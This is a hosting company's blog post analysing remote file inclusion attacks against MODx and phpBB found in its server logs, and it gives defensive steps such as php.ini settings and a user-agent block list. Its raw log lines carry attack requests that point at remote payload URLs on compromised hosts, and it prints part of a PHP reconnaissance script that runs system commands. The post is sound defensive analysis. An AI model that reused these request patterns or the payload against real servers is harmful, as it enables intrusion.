Support

Blog

I’ve noticed a lot more hacker attacks in the logs for the servers we maintain recently.
This is probably due to more people using Botnets for attack scan’s.

What are the hackers looking for, and how can we prevent them getting in?

In most cases, the hackers are looking for vulnerabilities in common applications.  The most notorious of these would be things like PHPBB, WordPress, and other similar apps.  The most common attacks we are noticing these days are ones that leverage remote inclusion of files.

If I grab a couple of examples from the logs, you can see how they work:

195.74.61.78 – – [05/Apr/2009:01:25:59 +0800] “GET /en//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1” 404 4442 “-” “libwww-perl/5.808”
195.74.61.78 – – [05/Apr/2009:01:25:59 +0800] “GET /en//assets/snippets/reflect/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1” 404 4442 “-” “libwww-perl/5.808”
195.74.61.78 – – [05/Apr/2009:01:26:01 +0800] “GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1” 200 628 “-” “libwww-perl/5.808”
195.74.61.78 – – [05/Apr/2009:01:26:01 +0800] “GET //assets/snippets/reflect/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1” 404 4442 “-” “libwww-perl/5.808”
195.74.61.78 – – [07/Apr/2009:18:09:39 +0800] “GET ///assets/snippets/reflect/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1” 404 4442 “-” “libwww-perl/5.808”
195.74.61.78 – – [07/Apr/2009:18:09:45 +0800] “GET //assets/snippets/reflect/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1” 404 4442 “-” “libwww-perl/5.808”
195.74.61.78 – – [07/Apr/2009:18:15:02 +0800] “GET /en//assets/snippets/reflect/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1” 404 4442 “-” “libwww-perl/5.808”
195.74.61.78 – – [07/Apr/2009:18:15:03 +0800] “GET //assets/snippets/reflect/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1” 404 4442 “-” “libwww-perl/5.808”
195.74.61.78 – – [07/Apr/2009:18:22:34 +0800] “GET ///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1” 200 628 “-” “libwww-perl/5.808”
195.74.61.78 – – [07/Apr/2009:18:22:35 +0800] “GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1” 200 628 “-” “libwww-perl/5.808”
195.74.61.78 – – [07/Apr/2009:18:23:39 +0800] “GET /en//assets/snippets/reflect/errors.php?error=http://www.chattymamas.com/forum/impex/fx29id1.txt?? HTTP/1.1” 404 4442 “-” “Mozilla/5.0”
195.74.61.78 – – [07/Apr/2009:18:23:39 +0800] “GET //assets/snippets/reflect/errors.php?error=http://www.chattymamas.com/forum/impex/fx29id1.txt?? HTTP/1.1” 404 4442 “-” “Mozilla/5.0”
195.74.61.78 – – [07/Apr/2009:18:23:39 +0800] “GET /en/Support//assets/snippets/reflect/errors.php?error=http://www.chattymamas.com/forum/impex/fx29id1.txt?? HTTP/1.1” 404 4442 “-” “Mozilla/5.0”
195.74.61.78 – – [07/Apr/2009:18:27:12 +0800] “GET /en//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1” 404 4442 “-” “libwww-perl/5.808”
195.74.61.78 – – [07/Apr/2009:18:27:13 +0800] “GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1” 200 628 “-” “libwww-perl/5.808”

In the example above, the attacker is leveraging a vulnerability in MODx (a popular CMS that we use) to try to load a remote file.  What will happen is that this file will hopefully (for the hacker) get loaded from the remote server, and executed or placed into somewhere on our server, so that they can run it.

As we have logs for the attempts, I can also see where the attackers are coming from.  In this case, its Turkey, and the ip space is owned by a company called Gradwell.net (who I’ve notified).

The code that they’re trying to include is this:

= 4 && $len <=6) {
        return sprintf("%0.2f Kb", $number/1024);
    }
    if($len >= 7 && $len <=9) {
        return sprintf("%0.2f Mb", $number/1024/1024);
    }
    return sprintf("%0.2f Gb", $number/1024/1024/1024);
}                          

echo "Coracore
";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {
    $free = 0;
}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {
    $all = 0;
}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "Coracore
";
echo "uname -a: $un
";
echo "os: $os
";
echo "id: $id1
";
echo "free: $free
";
echo "used: $used
";
echo "total: $all
";
exit;

The code doesn’t appear to be too harmful for the initial run, it appears that they try to find out more about the system – which is what the script does.

So, the easiest thing to do to stop these type of attacks is to disallow remote inclusion.

If we check our php.ini file (typically /etc/php5/apache2/php.ini ) for php5/apache2 users in Debian, we see a couple of settings that are interesting.

; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
allow_url_fopen = Off

; Whether to allow include/require to open URLs (like http:// or ftp://) as files.
allow_url_include = Off

In my setup above, I’ve disallowed url_fopen, and url_include (which are what the attacks are using to get their stuff on our server).
This simple step will block most remote inclusion attacks.

I’ll show another couple of attacks from our log files below:

nk210-203-73-105.adsl.static.apol.com.tw – – [18/May/2008:05:40:27 +0800] “GET //index.php?_SERVER[DOCUMENT_ROOT]=http://ieras.ru/tmp/nid.txt? HTTP/1.1” 200 5157 “-” “libwww-perl/5.65”
c2.33.1343.static.theplanet.com – – [19/May/2008:05:23:43 +0800] “GET //index.php?_SERVER[DOCUMENT_ROOT]=http://ieras.ru/tmp/mid.txt? HTTP/1.1” 200 5157 “-” “libwww-perl/5.79”
92.f0.354a.static.theplanet.com – – [29/May/2008:04:59:23 +0800] “GET //index.php?_SERVER[DOCUMENT_ROOT]=http://ieras.ru/tmp/mid.txt? HTTP/1.1” 200 5157 “-” “libwww-perl/5.79”
dime68.dizinc.com – – [10/Jun/2008:22:18:45 +0800] “GET //index.php?_SERVER[DOCUMENT_ROOT]=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1” 200 5157 “-” “libwww-perl/5.811”
dime68.dizinc.com – – [10/Jun/2008:23:41:16 +0800] “GET //index.php?_SERVER[DOCUMENT_ROOT]=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1” 200 5157 “-” “libwww-perl/5.811”
dime68.dizinc.com – – [11/Jun/2008:02:48:31 +0800] “GET //index.php?_SERVER[DOCUMENT_ROOT]=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1” 200 5157 “-” “libwww-perl/5.811”
v8.emzwo.de – – [25/Jul/2008:03:31:17 +0800] “GET //index.php?_SERVER[DOCUMENT_ROOT]=ftp://212.11.127.86/tmp/trem/1? HTTP/1.1” 200 5157 “-” “libwww-perl/5.805”
v8.emzwo.de – – [25/Jul/2008:03:36:39 +0800] “GET //index.php?_SERVER[DOCUMENT_ROOT]=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1” 200 5157 “-” “libwww-perl/5.805”
v8.emzwo.de – – [25/Jul/2008:04:06:31 +0800] “GET //index.php?_SERVER[DOCUMENT_ROOT]=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1” 200 5157 “-” “libwww-perl/5.805”
85.230.115.32 – – [15/Sep/2008:07:35:26 +0800] “GET //index.php?_SERVER[DOCUMENT_ROOT]=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1” 200 4981 “-” “libwww-perl/5.79”
85.230.115.32 – – [15/Sep/2008:07:35:41 +0800] “GET //index.php?_SERVER[DOCUMENT_ROOT]=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1” 200 4981 “-” “libwww-perl/5.79”
85.230.115.32 – – [15/Sep/2008:07:36:18 +0800] “GET //index.php?_SERVER[DOCUMENT_ROOT]=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1” 200 4981 “-” “libwww-perl/5.79”
218.106.254.18 – – [27/Mar/2009:19:45:24 +0800] “GET /modules/MDForum/includes/functions_admin.php?phpbb_root_path=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1” 404 350 “-” “libwww-perl/5.79”
218.106.254.18 – – [27/Mar/2009:19:45:24 +0800] “GET /blog/2009/03/fake-100rmb-notes-in-circulation-again/modules/MDForum/includes/functions_admin.php?phpbb_root_path=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1” 404 11664 “-” “libwww-perl/5.79”
69.64.34.249 – – [27/Mar/2009:19:50:47 +0800] “GET /modules/MDForum/includes/functions_admin.php?phpbb_root_path=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1” 404 350 “-” “libwww-perl/5.805”
69.64.34.249 – – [27/Mar/2009:19:50:47 +0800] “GET /blog/2009/03/fake-100rmb-notes-in-circulation-again%20/modules/MDForum/includes/functions_admin.php?phpbb_root_path=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1” 404 11664 “-” “libwww-perl/5.805”
69.64.34.249 – – [27/Mar/2009:19:50:58 +0800] “GET /blog/2009/03/modules/MDForum/includes/functions_admin.php?phpbb_root_path=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1” 404 11664 “-” “libwww-perl/5.805”
218.106.254.18 – – [27/Mar/2009:20:05:04 +0800] “GET /blog/2009/03/fake-100rmb-notes-in-circulation-again%20/modules/MDForum/includes/functions_admin.php?phpbb_root_path=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1” 404 11664 “-” “libwww-perl/5.79”
218.106.254.18 – – [27/Mar/2009:20:05:07 +0800] “GET /blog/2009/03/modules/MDForum/includes/functions_admin.php?phpbb_root_path=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1” 404 11664 “-” “libwww-perl/5.79”
8.6.221.82 – – [06/Apr/2009:18:16:39 +0800] “GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.neskan.cz/tmp/copyright.txt? HTTP/1.1” 200 628 “-” “Mozilla/5.0”
8.6.221.82 – – [06/Apr/2009:18:16:39 +0800] “GET /en/Support//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.neskan.cz/tmp/copyright.txt? HTTP/1.1” 404 4442 “-” “Mozilla/5.0”
8.6.221.82 – – [06/Apr/2009:18:16:42 +0800] “GET /en//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.neskan.cz/tmp/copyright.txt? HTTP/1.1” 404 4442 “-” “Mozilla/5.0”

You’ll notice that most of them do the same kind of things – attempts to include remote files.  As of writing, some of the servers linked to have been cleaned up, but some haven’t.
The ip addresses on the left are where the attacker is coming in from.   Generally this indicates that the computer at that address has been compromised.

I usually try to contact the companies where possible, but usually I get responses which aren’t very helpful, or their mail bounces.  Both no-no’s in my book!

If I check the last line in the logs -8.6.221.82, there are a number of tools I can use to find out more info about that ip address.

In this case, I did a quick whois of the address, and got this:

whois 8.6.221.82
Level 3 Communications, Inc. LVLT-ORG-8-8 (NET-8-0-0-0-1)
8.0.0.0 – 8.255.255.255
Hostway Corporation LVLT-HSWY-8-6-220 (NET-8-6-220-0-1)
8.6.220.0 – 8.6.223.255

The server also has reverse dns (not all do).

nslookup 8.6.221.82
Server:        127.0.0.1
Address:    127.0.0.1#53

Non-authoritative answer:
82.221.6.8.in-addr.arpa    name = server3.clanpimp.net.

So I can see that the attacker is coming in from US address space (those cheeky american’s always complain about Chinese attacking them, but we never get to complain about American’s attacking us…), and they are from something called server3.clanpimp.net

Its actually more important to try to clear out the servers serving up the vulnerabilities, as more computers can be made safer that way.

If we check to see who owns the www.vampires-fifa-liga.de domain ( remember the remote file trying to get included was here -http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt), you’ll see that its…   Level 3.

dig www.vampires-fifa-liga.de

; <<>> DiG 9.3.4-P1.1 <<>> www.vampires-fifa-liga.de
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 35558
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;www.vampires-fifa-liga.de.    IN    A

;; ANSWER SECTION:
www.vampires-fifa-liga.de. 86400 IN    A    62.67.235.162

whois 62.67.235.162
% This is the RIPE Whois query server #3.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Note: This output has been filtered.
%       To receive output for a database update, use the “-B” flag.

% Information related to ‘62.67.235.0 – 62.67.235.255’

inetnum:      62.67.235.0 – 62.67.235.255
netname:      EVANZO-DE
descr:        EVANZO-DE
country:      de
admin-c:      EDME2-RIPE
tech-c:       LTHM
status:       ASSIGNED PA
remarks:      all abuse reports to abuse@level3.com
mnt-by:       LEVEL3-MNT
mnt-lower:    LEVEL3-MNT
source:       RIPE # Filtered

Color me unsuprised.  (I’ve covered Level 3 in previous posts about this kind of thing…)

As the other hacked server providing remote php inclusion files Kortech.cn (http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt)  is in our local area, I can give them an email and see if they respond.
If they don’t I can also call them – they’re Shanghai based.
Currently they’re serving up the following:

http://www.kortech.cn/bbs//skin/zero_vote/logi.txt
http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt

Will be interesting to see if the people there will listen or not!

Its actually in their own interest to clear up the infection -currently their server is getting loaded with requests for that file.

A search for that filename will reveal how extensively they’re getting slammed:

http://search.yahoo.com/search?p=http%3A%2F%2Fwww.kortech.cn%2Fbbs%2F%2Fskin%2Fzero_vote%2Flogi.txt&ei=UTF-8&fr=moz2

Another thing to look at is who the bots claim to be when they connect to the server.  The observant amongst you will have noticed that most of the connections are coming from libwww-perl/someversion

This is something we can also protect against.  If I check my logs, I notice that zero legitimate connections use libwww-perl, but 100% of hack attempts use it.
What does that mean?
Its another easy way to block these kind of attempts.

If I add this to my apache2.conf for a server, I can block libwww-perl, and other bad User-Agents from accessing my site, and wasting my bandwidth.

SetEnvIfNoCase User-Agent "^Wget" bad_bot
SetEnvIfNoCase User-Agent "^EmailSiphon" bad_bot
SetEnvIfNoCase User-Agent "^EmailWolf" bad_bot
SetEnvIfNoCase User-Agent "^libwww-perl" bad_bot

<Location />
    Order allow,deny
    Allow from all
    Deny from env=bad_bot
</Location>

Simple, and easy!
This doesn’t stop attacks from other user-agents, but as most of the current ones appear to be using libwww-perl extensively, it gives us a bit more protection until the blackhats change their methods. At least this stops the script kiddies!

Archives

Categories

Tags

PHOTOSTREAM